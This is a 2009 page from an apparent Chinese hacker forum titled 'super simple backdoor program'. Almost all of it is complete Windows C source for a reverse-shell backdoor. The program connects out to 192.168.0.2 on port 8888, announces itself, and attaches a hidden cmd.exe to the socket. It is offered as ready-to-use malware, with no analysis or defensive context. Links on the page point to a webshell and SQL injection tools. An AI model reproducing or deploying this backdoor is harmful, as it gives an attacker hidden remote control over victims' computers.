超简单的后门程序

首页

新闻中心

安全文档

红客学院

下载中心

联盟原创

红盟论坛

超简单的后门程序

发表时间：2009-12-18 10:08:36 作者：来源：收藏本页

#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

int cmdshell(SOCKET s)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
GetStartupInfo(&si);

si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=si.hStdOutput=si.hStdError=(void*)s;

char cmdline[256];
GetSystemDirectory(cmdline,sizeof(cmdline));
strcat(cmdline,"\\cmd.exe");

int ret;
ret=CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&si,&pi);
WaitForSingleObject(pi.hProcess,INFINITE);
CloseHandle(pi.hProcess);
return 0;
}

int main(int argc, char* argv[])
{
char MyMessage[512] = "Backdoor start\n";
WSADATA wsaData;

WORD sockVersion = MAKEWORD(2, 2);

if(WSAStartup(sockVersion, &wsaData) != 0)
return 0;

SOCKET s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
if(s == INVALID_SOCKET)
{
printf(" socket error \n");
return 0;
}
sockaddr_in sin;
sin.sin_family = AF_INET;
//8888端口
sin.sin_port = htons(8888);
sin.sin_addr.S_un.S_addr = inet_addr("192.168.0.2");
if(connect(s, (sockaddr*)&sin, sizeof(sin)) == -1)
{
printf(" connect error \n");
return 0;
}
if (send(s,MyMessage,strlen(MyMessage),0)==SOCKET_ERROR)
{
printf("Send message error \n");
return 0;
}
cmdshell(s);
return 0;

}

上一篇：珍藏版的SQL旁注精华程序

下一篇：改的一个非GBK的JSP的webshell

milw0rm	骇安网	能邦反病毒	华夏黑盟	鲁大师	数据恢复	红盟	红色黑客联盟
中国黑客联盟	黑蚂蚁安全网	编程技术与维护	安防快线	反病毒小组	Tosec安全组	3.A.S.T小组